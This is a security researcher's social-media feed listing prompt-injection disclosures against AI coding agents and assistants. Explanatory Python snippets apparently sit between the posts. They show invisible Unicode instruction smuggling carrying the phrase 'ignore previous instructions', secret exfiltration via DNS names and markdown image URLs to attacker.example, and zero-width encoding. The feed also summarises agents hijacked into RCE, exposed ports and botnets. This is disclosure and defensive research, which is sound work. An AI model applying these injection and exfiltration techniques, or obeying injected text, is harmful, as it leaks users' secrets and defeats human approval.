Johann Rehberger
@wuzzi23.bsky.social
reposted by
Johann Rehberger
iurii (Юра) 🇺🇦
28 days ago
Great series, kudos. To rephrase the old joke: the S in VIBE coding stands for Security.
AgentHopper: An AI Virus - Month of AI Bugs Season Finale - Enjoy! 🍿
AgentHopper: An AI Virus · Embrace The Red
AgentHopper: A proof-of-concept AI Virus
https://embracethered.com/blog/posts/2025/agenthopper-a-poc-ai-virus/
30 days ago
Episode 26: AWS Kiro: Arbitrary Code Execution via Indirect Prompt Injection
AWS Kiro: Arbitrary Code Execution via Indirect Prompt Injection · Embrace The Red
Agents That Can Overwrite Their Own Configuration and Security Settings
https://embracethered.com/blog/posts/2025/aws-kiro-aribtrary-command-execution-with-indirect-prompt-injection/
about 1 month ago
Episode 25: How Prompt Injection Exposes Manus' VS Code Server to the Internet
How Prompt Injection Exposes Manus' VS Code Server to the Internet · Embrace The Red
This post shows how an indirect prompt injection can trick Manus to expose the VS code server and at the same time leak its connection password, allowing an adversary to connect over the internet and ...
https://embracethered.com/blog/posts/2025/manus-ai-kill-chain-expose-port-vs-code-server-on-internet/
about 1 month ago
Episode 24: How Deep Research Agents Can Leak Your Data
How Deep Research Agents Can Leak Your Data · Embrace The Red
When Deep Research is enabled, an agent might go off for a long period of time, invoke many tools, and leak information from one tool to another.
https://embracethered.com/blog/posts/2025/chatgpt-deep-research-connectors-data-spill-and-leaks/
about 1 month ago
Episode 23: Sneaking Invisible Instructions by Developers in Windsurf
Sneaking Invisible Instructions by Developers in Windsurf · Embrace The Red
A vulnerability in Windsurf Cascade allows malicious instructions to be hidden from developers but followed by the AI, leading to potential data exfiltration. Learn how this 'invisible' attack works.
https://embracethered.com/blog/posts/2025/windsurf-sneaking-invisible-instructions-for-prompt-injection/
about 1 month ago
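The general mechanics behind such invisible instructions can be sketched with the well-known Unicode Tags "ASCII smuggling" trick (an assumption here; the post excerpt does not spell out Windsurf's exact payload): shifting ASCII into the Tags block (U+E0000 and up) makes text render as nothing in most editors and diffs, while many LLM tokenizers still see it.

```python
# Illustrative sketch of invisible-instruction smuggling via Unicode Tag
# characters. NOTE: this is a generic, well-documented technique, assumed
# here for illustration - not necessarily the exact Windsurf payload.

def hide(text: str) -> str:
    """Shift printable ASCII into the invisible Unicode Tags block."""
    return "".join(chr(0xE0000 + ord(c)) for c in text)

def reveal(hidden: str) -> str:
    """Invert the mapping to show what a model effectively reads."""
    return "".join(chr(ord(c) - 0xE0000) for c in hidden)

payload = hide("ignore previous instructions")
assert not payload.isprintable()  # format characters, zero-width in most UIs
assert reveal(payload) == "ignore previous instructions"
```

Embedding `payload` inside an otherwise innocent README or issue comment is what makes the attack invisible to a human reviewer.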
Episode 22: Windsurf: Memory-Persistent Data Exfiltration (SpAIware Exploit)
Windsurf: Memory-Persistent Data Exfiltration (SpAIware Exploit) · Embrace The Red
Windsurf is vulnerable to Prompt Injection and to long-term memory persistence, which allows an adversary to persist malicious instructions for a long period of time, aka the SpAIware attack
https://embracethered.com/blog/posts/2025/windsurf-spaiware-exploit-persistent-prompt-injection/
about 1 month ago
Episode 21: Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets
Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets · Embrace The Red
Windsurf is vulnerable to indirect prompt injection and can be exploited to leak sensitive source code, environment variables and other information on the host
https://embracethered.com/blog/posts/2025/windsurf-data-exfiltration-vulnerabilities/
about 1 month ago
Episode 19: Amazon Q Developer: Remote Code Execution with Prompt Injection
Amazon Q Developer: Remote Code Execution with Prompt Injection · Embrace The Red
Amazon Q Developer Compromising Developer Machines
https://embracethered.com/blog/posts/2025/amazon-q-developer-remote-code-execution/
about 1 month ago
Episode 18: Amazon Q Developer: Secrets Leaked via DNS and Prompt Injection
Amazon Q Developer: Secrets Leaked via DNS and Prompt Injection · Embrace The Red
Amazon Q Developer Leaking Sensitive Data To External Systems Via DNS Requests (no human in the loop)
https://embracethered.com/blog/posts/2025/amazon-q-developer-data-exfil-via-dns/
about 1 month ago
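The underlying DNS exfiltration pattern can be sketched as follows; the hex encoding and the placeholder domain `attacker.example` are illustrative assumptions, not the exact payload from the post. The point is that resolving a hostname whose labels carry encoded secrets delivers the data to the attacker's authoritative nameserver logs with no human in the loop.

```python
# Illustrative sketch of DNS-based data exfiltration (encoding only - no
# lookups are performed). attacker.example is a placeholder domain.

def to_dns_names(secret: bytes, domain: str = "attacker.example") -> list[str]:
    """Hex-encode a secret and split it into DNS labels (max 63 chars each)."""
    hexed = secret.hex()
    labels = [hexed[i:i + 63] for i in range(0, len(hexed), 63)]
    # Each lookup like "6177735f...".attacker.example reaches the attacker's
    # nameserver logs even if no TCP connection is ever established.
    return [f"{label}.{domain}" for label in labels]

names = to_dns_names(b"AWS_SECRET_ACCESS_KEY=abc123")
```

A hijacked agent only needs permission to run something as innocuous as `ping` or `nslookup` against these names for the leak to succeed.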
Episode 17: Data Exfiltration via Image Rendering Fixed in Amp Code
Data Exfiltration via Image Rendering Fixed in Amp Code · Embrace The Red
AmpCode is vulnerable to Prompt Injection and it was possible to leak sensitive source code, environment variables and other information on the host
https://embracethered.com/blog/posts/2025/amp-code-fixed-data-exfiltration-via-images/
about 1 month ago
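The image-rendering exfiltration pattern that was fixed here can be sketched generically (the URL, filename, and helper function below are illustrative assumptions, not Amp's exact payload): injected instructions make the agent emit a markdown image whose query string carries the data, and the client leaks it the moment it fetches the image.

```python
# Illustrative sketch of markdown-image data exfiltration.
# attacker.example and pixel.png are placeholders.
from urllib.parse import quote

def exfil_image_markdown(data: str) -> str:
    """Build a markdown image whose URL query string smuggles out data."""
    return f"![status](https://attacker.example/pixel.png?d={quote(data)})"

md = exfil_image_markdown("API_KEY=sk-live-123")
# Rendering this markdown triggers an HTTP GET carrying the secret.
```

The fix class for this bug is typically an allowlist of image domains, so arbitrary attacker-controlled URLs are never fetched.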
Episode 16: Amp Code: Invisible Prompt Injection Fixed by Sourcegraph
Amp Code: Invisible Prompt Injection Fixed by Sourcegraph · Embrace The Red
Sourcegraph recently fixed a vulnerability that allowed invisible instructions to perform prompt injection and hijack the agent.
https://embracethered.com/blog/posts/2025/amp-code-fixed-invisible-prompt-injection/
about 1 month ago
👉 Episode 15: Google Jules is Vulnerable To Invisible Prompt Injection
Google Jules is Vulnerable To Invisible Prompt Injection · Embrace The Red
Jules is vulnerable to Prompt Injection from invisible instructions in untrusted data, which can end up running arbitrary operating system commands via the run_in_bash_session tool
https://embracethered.com/blog/posts/2025/google-jules-invisible-prompt-injection/
about 1 month ago
👉 Episode 14: Jules Zombie Agent: From Prompt Injection to Remote Control
Jules Zombie Agent: From Prompt Injection to Remote Control · Embrace The Red
Jules is vulnerable to Prompt Injection and can be exploited to leak sensitive source code, environment variables and achieve remote command & control by joining a botnet.
https://embracethered.com/blog/posts/2025/google-jules-remote-code-execution-zombai/
about 1 month ago
👉 Episode 13: Google Jules: Vulnerable to Multiple Data Exfiltration Issues with Prompt Injection
Google Jules: Vulnerable to Multiple Data Exfiltration Issues · Embrace The Red
Jules is vulnerable to Prompt Injection and can be exploited to leak sensitive source code, environment variables and other information on the host
https://embracethered.com/blog/posts/2025/google-jules-vulnerable-to-data-exfiltration-issues/
about 1 month ago
reposted by
Johann Rehberger
Aymeric C.
about 1 month ago
Great summary by @simonwillison.net of @wuzzi23.bsky.social's findings on AI tool vulnerabilities. In short, all AI tools are vulnerable if one attaches external files and links to their prompts, leading to secret leaks and remote code execution. Johann publishes daily until the end of the month.
The Summer of Johann: prompt injections as far as the eye can see
Independent AI researcher Johann Rehberger (previously) has had an absurdly busy August. Under the heading The Month of AI Bugs he has been publishing one report per day across an …
https://simonwillison.net/2025/Aug/15/the-summer-of-johann/
💥 Remote Code Execution in GitHub Copilot (CVE-2025-53773) 👉 Prompt injection exploit writes to Copilot config file & puts it into YOLO mode, and we get immediate RCE 🔥 Bypasses all user approvals 🛡️ Patch is out today. Update before someone else does it for you
GitHub Copilot: Remote Code Execution via Prompt Injection (CVE-2025-53773) · Embrace The Red
An attacker can put GitHub Copilot into YOLO mode by modifying the project's settings.json file on the fly, and then executing commands, all without user approval
https://embracethered.com/blog/posts/2025/github-copilot-remote-code-execution-via-prompt-injection/
about 2 months ago
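As a defensive sketch, one can scan workspaces for the auto-approve flag this class of exploit flips on. The key name `chat.tools.autoApprove` follows public write-ups of CVE-2025-53773 and should be treated as an assumption to verify against your VS Code version; extend the list for your own environment.

```python
# Defensive sketch: flag workspaces whose settings enable YOLO-style
# auto-approval. The key name is an assumption based on public write-ups.
import json
from pathlib import Path

SUSPICIOUS_KEYS = {"chat.tools.autoApprove"}

def risky_settings(workspace: str) -> set[str]:
    """Return suspicious keys set to true in .vscode/settings.json, if any."""
    path = Path(workspace) / ".vscode" / "settings.json"
    if not path.is_file():
        return set()
    # Real VS Code settings files may contain comments (JSONC);
    # strict JSON is assumed here for simplicity.
    settings = json.loads(path.read_text())
    return {k for k in SUSPICIOUS_KEYS if settings.get(k) is True}
```

Because the exploit writes this file "on the fly", monitoring `.vscode/settings.json` for unexpected changes is as important as scanning it once.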
Episode 11: Claude Code: Data Exfiltration with DNS
Claude Code: Data Exfiltration with DNS · Embrace The Red
Claude Code Can Leak Sensitive Data To External Systems with DNS requests
https://embracethered.com/blog/posts/2025/claude-code-exfiltration-via-dns-requests/
about 2 months ago
Episode 10: ZombAI Exploit with OpenHands: Prompt Injection To Remote Code Execution
ZombAI Exploit with OpenHands: Prompt Injection To Remote Code Execution · Embrace The Red
When processing untrusted data, OpenHands can be hijacked to run remote code (RCE) and connect to an attacker's command and control system
https://embracethered.com/blog/posts/2025/openhands-remote-code-execution-zombai/
about 2 months ago
Episode 9: OpenHands and the Lethal Trifecta: How Prompt Injection Can Leak Access Tokens
OpenHands and the Lethal Trifecta: How Prompt Injection Can Leak Access Tokens · Embrace The Red
OpenHands Coding Agent Data Exfiltration Threats
https://embracethered.com/blog/posts/2025/openhands-the-lethal-trifecta-strikes-again/
about 2 months ago
Episode 8: AI Kill Chain in Action: Devin AI Exposes Ports to the Internet with Prompt Injection
AI Kill Chain in Action: Devin AI Exposes Ports to the Internet with Prompt Injection · Embrace The Red
https://embracethered.com/blog/posts/2025/devin-ai-kill-chain-exposing-ports/
about 2 months ago
Episode 7: How Devin AI Can Leak Your Secrets via Multiple Means
How Devin AI Can Leak Your Secrets via Multiple Means · Embrace The Red
Data gone, oops.
https://embracethered.com/blog/posts/2025/devin-can-leak-your-secrets/
about 2 months ago
Episode 6: I Spent $500 To Test Devin AI For Prompt Injection So That You Don't Have To
I Spent $500 To Test Devin AI For Prompt Injection So That You Don't Have To · Embrace The Red
I Paid $500 to test Devin AI for security vulnerabilities in April 2025. When processing untrusted data Devin can be hijacked to run remote code (RCE) and connect to an attacker's command and control ...
https://embracethered.com/blog/posts/2025/devin-i-spent-usd500-to-hack-devin/
about 2 months ago
Episode 5: Amp Code: Arbitrary Command Execution via Prompt Injection Fixed - Novel TTP!
Amp Code: Arbitrary Command Execution via Prompt Injection Fixed · Embrace The Red
By automatically allowlisting bash commands or adding a fake MCP server, it was possible for prompt injection to achieve code execution on the developer's machine!
https://embracethered.com/blog/posts/2025/amp-agents-that-modify-system-configuration-and-escape/
about 2 months ago
Episode 4: Cursor IDE: Arbitrary Data Exfiltration Via Mermaid (CVE-2025-54132)
Cursor IDE: Arbitrary Data Exfiltration Via Mermaid (CVE-2025-54132) · Embrace The Red
Cursor Data Exfiltration via Mermaid Image Rendering
https://embracethered.com/blog/posts/2025/cursor-data-exfiltration-with-mermaid/
about 2 months ago
Episode 3: Anthropic Filesystem MCP Server: Directory Access Bypass via Improper Path Validation
Anthropic Filesystem MCP Server: Directory Access Bypass via Improper Path Validation · Embrace The Red
Improper Path Prefix Validation Allows Access to Alternate Directories
https://embracethered.com/blog/posts/2025/anthropic-filesystem-mcp-server-bypass/
about 2 months ago
Episode 2: Turning ChatGPT Codex Into A ZombAI Agent
Turning ChatGPT Codex Into A ZombAI Agent · Embrace The Red
Common Dependencies Allowlist includes domain that allows full remote control of ChatGPT Codex (ZombAI)
https://embracethered.com/blog/posts/2025/chatgpt-codex-remote-control-zombai/
about 2 months ago
Episode 1: Exfiltrating Your ChatGPT Chat History and Memories With Prompt Injection
Exfiltrating Your ChatGPT Chat History and Memories With Prompt Injection · Embrace The Red
https://embracethered.com/blog/posts/2025/chatgpt-chat-history-data-exfiltration/
about 2 months ago
The Month of AI Bugs 2025 · Embrace The Red
August 2025 will be the month of Agentic ProbLLMs and AI Bugs. Fresh posts nearly every day.
https://embracethered.com/blog/posts/2025/announcement-the-month-of-ai-bugs/
2 months ago
Month of AI Bugs!
2 months ago
Prompt injection is fascinating... 🧐
3 months ago
Hosting COM Servers with an MCP Server - AI-powered Office Automation
Hosting COM Servers with an MCP Server · Embrace The Red
An MCP Server that can host COM servers for advanced Windows Automation
https://embracethered.com/blog/posts/2025/mcp-com-server-automate-anything-on-windows/
4 months ago
Anthropic archived many of their reference MCP servers from their GitHub repository! Probably too much of a liability, especially because they are associated with other companies, like GitHub, Slack, Google,...
4 months ago
🔥 New blog post: AI ClickFix! Explores how classic ClickFix social engineering attacks can target AI agents, like Claude Computer-Use. Learn what ClickFix is, how it works in detail, and see a working proof-of-concept. Scary stuff. 👇
AI ClickFix: Hijacking Computer-Use Agents Using ClickFix · Embrace The Red
AI Clickfix
https://embracethered.com/blog/posts/2025/ai-clickfix-ttp-claude/
4 months ago
Dangerous image!
5 months ago
Cool! GitHub is introducing a change to make hidden Unicode characters visible in the web UI.
5 months ago
🔥 SpAIware & More: Advanced Prompt Injection Exploits in LLM Applications 🔥 👉 Black Hat posted my talk to YouTube - Enjoy! 🍿😈 A wild journey of exploits, culminating in compromising ChatGPT's long-term memory for continuous remote command and control! 😱
https://www.youtube.com/embed/84NVG1c5LRI
5 months ago
GitHub Copilot Custom Instructions - Risks and what to be aware of!
GitHub Copilot Custom Instructions and Risks · Embrace The Red
Custom Rule Files in Code Editors Can Be Abused By Adversaries
https://embracethered.com/blog/posts/2025/github-custom-copilot-instructions/
6 months ago
Figured this would be a fun weekend project... Claude Desktop + COM Automation 🤯 Outlook, Excel, Word, Shell - anything with a COM interface on Windows is now discoverable and scriptable using this MCP server that wraps COM. AI just got an upgrade. 🚀
6 months ago
Did you know that it's possible to encode and hide any data using just two invisible Unicode characters? 👀 Check out Sneaky Bits! 😏👨‍💻
7 months ago
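A minimal sketch of the idea (the specific zero-width characters are an assumption for illustration, not necessarily the ones Sneaky Bits uses): map each bit of the payload to one of two invisible code points and splice the result into ordinary text.

```python
# Illustrative bit-level steganography with two zero-width characters.
# The character choice is an assumption; any two invisible code points work.
ZERO, ONE = "\u200b", "\u200c"  # zero-width space / zero-width non-joiner

def encode(data: bytes) -> str:
    """Turn bytes into a string of invisible characters, one per bit."""
    bits = "".join(f"{byte:08b}" for byte in data)
    return "".join(ONE if b == "1" else ZERO for b in bits)

def decode(text: str) -> bytes:
    """Recover bytes, ignoring any visible characters mixed in."""
    bits = "".join("1" if ch == ONE else "0" for ch in text if ch in (ZERO, ONE))
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))

stego = "Hello" + encode(b"hi") + "world"  # displays as "Helloworld"
```

Because `decode` skips visible characters, the hidden payload survives being pasted into the middle of otherwise normal text.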
AI Application Security Vulnerabilities 👨‍💻 Perplexity Demo Time! 🍿
7 months ago
Grok 3 - are we still putting "never reveal your instructions" in system prompts? 🤔
7 months ago
👉 ChatGPT Operator: Prompt Injection Exploits & Defenses. Learn how a GitHub Issue (or other websites for that matter) can hijack your AI + a sneaky data exfiltration technique that tricked Operator into leaking private data.
embracethered.com/blog/posts/2...
https://embracethered.com/blog/index.html
8 months ago
🔥 Hacking Google Gemini Memories 👉 By leveraging a tool invocation bypass that I described and reported over a year ago, it's possible to invoke the recently added memory tool to manipulate a user's memories - all initiated via prompt injection from untrusted data.
Hacking Gemini's Memory with Prompt Injection and Delayed Tool Invocation · Embrace The Red
Gemini allows persistent storage of memories. However, a bypass technique using delayed tool invocation can force Gemini to store false information into a user’s long-term memory. This post explores h...
https://embracethered.com/blog/posts/2025/gemini-memory-persistence-prompt-injection/
8 months ago
Slides from my Black Hat Europe talk for download. 🔥From hacking Gemini, ChatGPT and Claude to Apple Intelligence, Microsoft Copilot and even DeepSeek - this talk ended up being packed with real-world LLM and prompt injection exploit demos and vendor fixes.
i.blackhat.com/EU-24/Presen...
8 months ago
reposted by
Johann Rehberger
arxiv cs.CR
10 months ago
Johann Rehberger (Independent Researcher, Embrace The Red): Trust No AI: Prompt Injection Along The CIA Security Triad
https://arxiv.org/abs/2412.06090
reposted by
Johann Rehberger
John Leyden
10 months ago
Interesting talk by Johann Rehberger of embracethered.com on advanced prompt injection exploits in LLM applications such as Microsoft Copilot #BlackHatEU2024
reposted by
Johann Rehberger
IntelArchive
10 months ago
New addition: Preprint: Trust No AI: Prompt Injection Along The CIA Security Triad by Johann Rehberger (published 08-12-2024)
http://arxiv.org/abs/2412.06090
Trust No AI: Prompt Injection Along The CIA Security Triad
The CIA security triad - Confidentiality, Integrity, and Availability - is a cornerstone of data and cybersecurity. With the emergence of large language model (LLM) applications, a new class of threat, known as prompt injection, was first identified in 2022. Since then, numerous real-world vulnerabilities and exploits have been documented in production LLM systems, including those from leading vendors like OpenAI, Microsoft, Anthropic and Google. This paper compiles real-world exploits and proof-of-concept examples, based on the research conducted and publicly documented by the author, demonstrating how prompt injection undermines the CIA triad and poses ongoing risks to cybersecurity and AI systems at large.
Interviewing ChatGPT Operator for a remote job... 🧐
8 months ago